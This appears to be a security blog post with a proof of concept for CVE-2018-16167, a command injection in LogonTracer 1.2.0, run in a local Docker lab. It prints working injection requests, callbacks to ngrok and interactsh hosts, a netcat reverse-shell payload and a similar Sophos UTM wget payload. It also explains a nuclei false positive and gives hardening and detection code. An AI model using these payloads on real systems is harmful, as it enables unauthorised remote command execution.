PoC for CVE-2018-16167 - ScienceChronicle

PoC for CVE-2018-16167

Posted on May 20, 2024  •  9 minutes  • 1840 words

Setup

We analyzed https://github.com/JPCERTCC/LogonTracer/blob/v1.2.0/docker/Dockerfile to understand how to run the container properly. We start a Neo4j container first and link the logontracer container to it. Note also that logontracer will not start unless the LTHOSTNAME environment variable is set.

docker run -d \
  --name neo4j \
  -p 7474:7474 \
  -p 7687:7687 \
  -e NEO4J_AUTH=neo4j/password \
  neo4j:3.2.3

docker run -d \
  --name logontracer \
  --link neo4j \
  -p 8080:8080 \
  -e LTHOSTNAME=localhost \
  jpcertcc/docker-logontracer:v1.2.0

Check:

curl http://localhost:7474
curl http://localhost:8080

To look around inside the container:

docker exec -it logontracer /bin/bash

For example, check the listening ports:

bash-4.3# netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:7473            0.0.0.0:*               LISTEN      11/java
tcp        0      0 0.0.0.0:7474            0.0.0.0:*               LISTEN      11/java
tcp        0      0 0.0.0.0:7687            0.0.0.0:*               LISTEN      11/java
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      519/python3

Note that the Neo4j ports (7473, 7474, 7687) are served by a java process inside the logontracer container itself: the image ships its own Neo4j, which is what LTHOSTNAME=localhost points LogonTracer at.

Alternatively, the same setup as a docker-compose.yaml:

version: '3.8'

services:
  neo4j:
    image: neo4j:3.2.3
    container_name: neo4j
    ports:
      - "7474:7474"
      - "7687:7687"
    environment:
      - NEO4J_AUTH=neo4j/password

  logontracer:
    image: jpcertcc/docker-logontracer:v1.2.0
    container_name: logontracer
    ports:
      - "8080:8080"
    environment:
      - LTHOSTNAME=localhost
    depends_on:
      - neo4j

and run it with

docker-compose up -d

and to shut it down:

docker-compose down

PoC

The vulnerability is an OS command injection (CWE-78): the timezone POST parameter of the /upload endpoint is concatenated into a shell command line without validation, so everything after timezone=1; is executed as a shell command on the server.
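
The injection pattern in miniature, as an added example that is not LogonTracer's own code: build_parse_command is a hypothetical stand-in for the part of the /upload handler that turns the POST parameters into a shell command (echo stands in for the real log parser), shown beside two layers of hardening, passing an argv list instead of a shell string and validating the parameter's shape. Run it with python3 on Linux.

```python
"""The command-injection pattern behind CVE-2018-16167 in miniature, beside a
hardened version. Added example, not LogonTracer's code: `build_parse_command`
is a hypothetical stand-in for the handler code that builds the shell command,
and `echo` stands in for the real log parser.
"""
import re
import subprocess


def build_parse_command(timezone: str) -> str:
    # Anti-pattern: an untrusted request parameter is pasted into a shell
    # command string. In "1;echo INJECTED;" the ';' terminates the intended
    # command, and the shell happily runs what follows.
    return "echo parse --timezone " + timezone


def run_vulnerable(timezone: str) -> str:
    # shell=True hands the whole string to /bin/sh, which is exactly what the
    # `timezone=1;<cmd>;` payload used in this post relies on.
    proc = subprocess.run(build_parse_command(timezone), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def run_argv_no_shell(timezone: str) -> str:
    # Hardening layer 1: no shell. Each argv element reaches the program as
    # data, so a ';' is just a character that echo prints back.
    proc = subprocess.run(["echo", "parse", "--timezone", timezone],
                          capture_output=True, text=True)
    return proc.stdout


# Hardening layer 2: accept only the shape the value can legitimately have
# (assumed here: a UTC offset in hours such as "1", "-5", "+10").
TIMEZONE_RE = re.compile(r"[+-]?\d{1,2}")


def validate_timezone(timezone: str) -> str:
    if not TIMEZONE_RE.fullmatch(timezone):
        raise ValueError(f"invalid timezone: {timezone!r}")
    return timezone


def run_hardened(timezone: str) -> str:
    # Both layers together: validate first, then run without a shell.
    return run_argv_no_shell(validate_timezone(timezone))


def hardened_rejects(timezone: str) -> bool:
    """True when the hardened path refuses the value outright."""
    try:
        run_hardened(timezone)
    except ValueError:
        return True
    return False


def injected(output: str) -> bool:
    """True when the smuggled second command actually ran (Linux /bin/sh)."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    payload = "1;echo INJECTED;"
    print("vulnerable :", repr(run_vulnerable(payload)))
    print("argv only  :", repr(run_argv_no_shell(payload)))
    print("hardened   :", "rejected" if hardened_rejects(payload) else "ran")
    print("hardened 1 :", repr(run_hardened("1")))
```

The argv list alone already neutralizes the metacharacters; the validation step is what turns a silently wrong parse into a rejected request, which is what you want from an upload endpoint exposed to the network.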

Test that the payload is really executed

Using ngrok

We use ngrok to test the call from logontracer to our nc listener.

Run netcat on port 8888:

nc -lvp 8888

Run ngrok to expose http://localhost:8888:

ngrok http 8888

Now we POST to the /upload endpoint of logontracer with curl. The injected command is itself a curl call to our ngrok URL:

curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl -H \"test:1\" https://X.ngrok-free.app/;" 

Note: https://X.ngrok-free.app/ is our ngrok URL forwarding to http://localhost:8888.

We are asking logontracer to execute curl -H "test:1" https://X.ngrok-free.app/. The extra -H "test:1" header is a marker proving that the request was made by our injected command and not by something else; you will see why this matters later when we discuss an in-the-wild case of this CVE.

Running the above curl command, the listener shows:

nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on localhost 59910
GET / HTTP/1.1
Host: X.ngrok-free.app
User-Agent: curl/7.61.0
Accept: */*
Test: 1
X-Forwarded-For: A.B.C.D
X-Forwarded-Host: X.ngrok-free.app
X-Forwarded-Proto: https
Accept-Encoding: gzip

where A.B.C.D is the external IP of the test machine.

The Test: 1 header is there (ngrok normalizes the header name), so the request really came from the curl we injected.

Using host.docker.internal url

A listener on the host machine can be reached from the container by replacing localhost:8888 with host.docker.internal:8888, a special hostname that resolves to the host. Docker Desktop provides it automatically; on Linux it must be mapped with extra_hosts and the host-gateway value (Docker 20.10 or later) in docker-compose.yaml:

version: '3.8'

services:
  neo4j:
    image: neo4j:3.2.3
    container_name: neo4j
    ports:
      - "7474:7474"
      - "7687:7687"
    environment:
      - NEO4J_AUTH=neo4j/password

  logontracer:
    image: jpcertcc/docker-logontracer:v1.2.0
    container_name: logontracer
    ports:
      - "8080:8080"
    extra_hosts:
      - "host.docker.internal:host-gateway"
    environment:
      - LTHOSTNAME=localhost
    depends_on:
      - neo4j

Now the test looks like this:

curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl -H \"test:1\" http://host.docker.internal:8888;" 

and the listening nc shows:

nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on 172.22.0.3 52396
GET / HTTP/1.1
Host: host.docker.internal:8888
User-Agent: curl/7.61.0
Accept: */*
test:1

Get shell

For this test we use the host.docker.internal hostname.

We get a reverse shell with:

curl -v -X POST http://localhost:8080/upload \
-H "Host: localhost" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;nc host.docker.internal 8888 -e /bin/bash;" 

The payload, nc host.docker.internal 8888 -e /bin/bash;, connects from the container back to our listener and attaches /bin/bash to that connection (this needs an nc build that supports -e, which the one in the image does).

The listening nc receives the connection and we use the shell to run ls:

nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on 172.22.0.3 37761
ls
LICENSE.txt
README.md
docker
images
logontracer.py
model
requirements.txt
sample
static
templates

Scanning in the wild

We ran into an interesting false positive for this CVE in the wild. A nuclei scan reported a site as vulnerable, but the PoC above did not give us a shell, so we investigated. We re-ran nuclei with the debug switch:

nuclei -t http/cves/2018/CVE-2018-16167.yaml -u https://x.y.z:443 -debug

where x.y.z is the site under investigation.

The result:

  ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.7

		projectdiscovery.io

[INF] Current nuclei version: v3.2.7 (latest)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[INF] [CVE-2018-16167] Dumped HTTP request for https://x.y.z:443/upload

POST /upload HTTP/1.1
Host: x.y.z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.39 (KHTML, like Gecko) Chrome/89.0.4389.111 Safari/537.39
Connection: close
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fcp6elbcevnbsmo7534vg5w3tqhy1xfgnb.oast.fun%3B
[DBG] [CVE-2018-16167] Dumped HTTP response https://x.y.z:443/upload

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Cache-Control: no-cache, private
Content-Type: text/html; charset=UTF-8
Date: Tue, 21 May 2024 18:40:49 GMT
Server: nginx
Set-Cookie: funtap_crm=jLIYiYAqPaUCPIaBhtpjabeUDWKCwBU3J6t446RO; expires=Tue, 21-May-2024 20:40:49 GMT; Max-Age=7200; path=/; httponly
Via: 1.1 google

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Server Error</title>

        <!-- Fonts -->
        <link rel="preconnect" href="https://fonts.gstatic.com">
        <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">

        <style>
            /* inlined normalize.css v8.0.1 and utility CSS omitted */
        </style>

        <style>
            body {
                font-family: 'Nunito', sans-serif;
            }
        </style>
    </head>
    <body class="antialiased">
        <div class="relative flex items-top justify-center min-h-screen bg-gray-100 dark:bg-gray-900 sm:items-center sm:pt-0">
            <div class="max-w-xl mx-auto sm:px-6 lg:px-8">
                <div class="flex items-center pt-8 sm:justify-start sm:pt-0">
                    <div class="px-4 text-lg text-gray-500 border-r border-gray-400 tracking-wider">
                        500                    </div>

                    <div class="ml-4 text-lg text-gray-500 uppercase tracking-wider">
                        Server Error                    </div>
                </div>
            </div>
        </div>
    </body>
</html>
[cp6elbcevnbsmo7534vg5w3tqhy1xfgnb] Received HTTP interaction from 129.124.121.114 at 2024-05-21 18:40:49
------------
HTTP Request
------------

GET / HTTP/1.1
Host: cp6elbcevnbsmo7534vg5w3tqhy1xfgnb.oast.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.fun
X-Interactsh-Version: 1.1.8

<html><head></head><body>bngfx1yhqt3w5gv4357omsbnvecble6pc</body></html>

[CVE-2018-16167:word-1] [http] [critical] https://x.y.z:443/upload

Nuclei template for the test:

id: CVE-2018-16167

info:
  name: LogonTracer <=1.2.0 - Remote Command Injection
  author: gy741
  severity: critical
  description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
  reference:
    - https://www.exploit-db.com/exploits/49918
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
    - https://jvn.jp/en/vu/JVNVU98026636/index.html
    - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16167
    cwe-id: CWE-78
  tags: rce,oast,edb,cve,cve2018,logontracer

requests:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B        

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/05/12

(https://github.com/ARPSyndicate/kenzer-templates/blob/master/nuclei/cvescan/critical/standalone/CVE-2018-16167.yaml)

The payload used by the template is

logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B

which, URL-decoded, is

logtype=XML&timezone=1;wget http://{{interactsh-url}};

Its only matcher is that some HTTP interaction reaches the interactsh URL (part interactsh_protocol, word "http"); nothing checks which client made that request.

Let’s re-check that test using our interactsh client:

interactsh-client -v

    _       __                       __       __  
   (_)___  / /____  _________ ______/ /______/ /_ 
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/

		projectdiscovery.io

[INF] Current interactsh version 1.1.9 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site

and run our PoC:

curl -v -X POST http://x.y.z/upload \
-H "Host: x.y.z" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;curl http://cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site;" 

and the interactsh client (same session as above, banner omitted) receives:
[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received DNS interaction (A) from 91.108.8.3 at 2024-05-21 19:05:32
-----------
DNS Request
-----------

;; opcode: QUERY, status: NOERROR, id: 36887
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site.	IN	 A


------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 36887
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site.	IN	 A

;; ANSWER SECTION:
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site.	3600	IN	A	178.128.16.97

;; AUTHORITY SECTION:
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site.	3600	IN	NS	ns1.oast.site.
cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site.	3600	IN	NS	ns2.oast.site.

;; ADDITIONAL SECTION:
ns1.oast.site.	3600	IN	A	178.128.16.97
ns2.oast.site.	3600	IN	A	178.128.16.97


[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received HTTP interaction from 129.15.11.205 at 2024-05-21 19:05:33
------------
HTTP Request
------------

GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)



-------------
HTTP Response
-------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.8

<html><head></head><body>5semijdci14wj0ok6vt78sbnvecf0f6pc</body></html>

[cp6f0fcevnbs87tv6ko0jw41icdjimes5] Received HTTP interaction from 129.154.61.221 at 2024-05-21 19:05:33
------------
HTTP Request
------------

GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
Accept-Language: en-US,en;q=0.5
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
User-Agent: TelegramBot (like TwitterBot)



-------------
HTTP Response
-------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.8

<html><head></head><body>5semijdci14wj0ok6vt78sbnvecf0f6pc</body></html>

OK, so nuclei was not cheating: the callback is real. But what if we remove curl from the payload altogether and leave only the URL:

curl -v -X POST http://x.y.z/upload \
-H "Host: x.y.z" \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept-Encoding: gzip" \
--data-urlencode "logtype=XML" \
--data-urlencode "timezone=1;http://cp6f4esevnbs8rv5qpe05oaynu6ngdjey.oast.live;" 

Note: every test with an interactsh URL uses a fresh one; a URL that has already been fetched is not requested again, presumably because the target fetches each URL only once (or blocks it after the first fetch).

Wow, we got the callback anyway! So the application we are posting to does not execute the command: it extracts any URL from the request body and fetches it once. The fetches above arrive with User-Agent: TelegramBot (like TwitterBot), not curl or wget, i.e. a link-preview style fetch rather than the tool named in our payload. That single fetch satisfies the template's matcher, which only checks that an HTTP interaction reached the interactsh URL, so the nuclei hit is a false positive. As noted, each URL is fetched only once, so a new URL is needed per test. No command runs on the target, so no payload can be delivered to it. A stricter template would also inspect the interactsh_request part for the User-Agent of the tool the payload invokes (wget or curl), or rely on a marker only the injected command could produce, such as the extra -H "test:1" header we used above.
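
As an added example (not from the original post, nuclei or interactsh), here is a small classifier that applies the distinction drawn in this section and in the earlier ngrok test to a captured OAST request: an injected command reveals itself through the User-Agent of the tool it invokes (curl/..., Wget/...) or through a marker header only our command would send (the -H "test:1" above), whereas a link-preview fetcher announces itself as a bot. The sample requests are constructed here, modelled on the ones captured above, and the bot list is an assumption to extend for your targets.

```python
"""Classify an out-of-band HTTP callback: did our injected command make it,
or did a link-preview fetcher just follow a URL found in the request body?
Added example, not part of the original post, nuclei or interactsh.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# User-Agent prefixes of the tools our payloads invoke (curl and wget).
PAYLOAD_TOOL_UAS = ("curl/", "Wget/")
# Assumed list of link-preview fetchers; extend for your targets.
PREVIEW_BOT_MARKERS = ("TelegramBot", "TwitterBot", "facebookexternalhit",
                       "Slackbot", "Discordbot", "WhatsApp")
# Marker header our payload sets with: curl -H "test:1" <url>
MARKER_HEADER, MARKER_VALUE = "test", "1"


@dataclass
class Callback:
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> Callback:
    """Parse the request line and headers of a raw HTTP/1.1 request dump.

    Header names are lower-cased and values stripped, so the raw "test:1"
    seen via nc and the "Test: 1" normalized by ngrok compare equal.
    """
    lines = raw.strip("\r\n").splitlines()
    method, path, _version = lines[0].split()
    cb = Callback(method, path)
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        cb.headers[name.strip().lower()] = value.strip()
    return cb


def classify(raw: str) -> str:
    """Return "command-executed", "url-preview" or "unknown"."""
    cb = parse_request(raw)
    ua = cb.headers.get("user-agent", "")
    if cb.headers.get(MARKER_HEADER) == MARKER_VALUE:
        return "command-executed"     # only our injected command adds the marker
    if ua.startswith(PAYLOAD_TOOL_UAS):
        return "command-executed"     # the tool named in the payload made the request
    if any(bot in ua for bot in PREVIEW_BOT_MARKERS):
        return "url-preview"          # a bot extracted the URL and fetched it
    return "unknown"


# Constructed samples, modelled on the requests captured in this post.
SAMPLE_INJECTED_CURL = """GET / HTTP/1.1
Host: host.docker.internal:8888
User-Agent: curl/7.61.0
Accept: */*
test:1
"""

SAMPLE_LINK_PREVIEW = """GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, br
User-Agent: TelegramBot (like TwitterBot)
"""

SAMPLE_WGET_NO_MARKER = """GET / HTTP/1.1
Host: cp6f0fcevnbs87tv6ko0jw41icdjimes5.oast.site
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
"""

if __name__ == "__main__":
    for name, sample in (("injected curl", SAMPLE_INJECTED_CURL),
                         ("link preview", SAMPLE_LINK_PREVIEW),
                         ("wget, no marker", SAMPLE_WGET_NO_MARKER)):
        print(f"{name:16s} -> {classify(sample)}")
```

The marker header is the stronger of the two signals: a preview bot could in principle present a curl-like User-Agent, but it will not add a header it has never seen, so a payload that sets one (curl -H or wget --header) turns the OAST callback from "someone fetched the URL" into "my command ran".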

PS

A very similar vulnerability is CVE-2020-25223 (Sophos UTM WebAdmin). The same mechanism applies: the SID field of the JSON body ends up in a shell command, so a value wrapped in pipes, |wget http://<interactsh-url>|, runs wget on the target, and detection again relies on an OAST callback, with the same false-positive caveat as above:

curl -X POST https://targetserver.com/var \
-H "Host: targetserver.com" \
-H "Accept: text/javascript, text/html, application/xml, text/xml, */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate" \
-H "X-Requested-With: XMLHttpRequest" \
-H "X-Prototype-Version: 1.5.1.1" \
-H "Content-Type: application/json; charset=UTF-8" \
-H "Origin: https://targetserver.com" \
-H "Connection: close" \
-H "Referer: https://targetserver.com" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data '{"objs": [{"FID": "init"}], "SID": "|wget http://<interactsh-url>|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}'
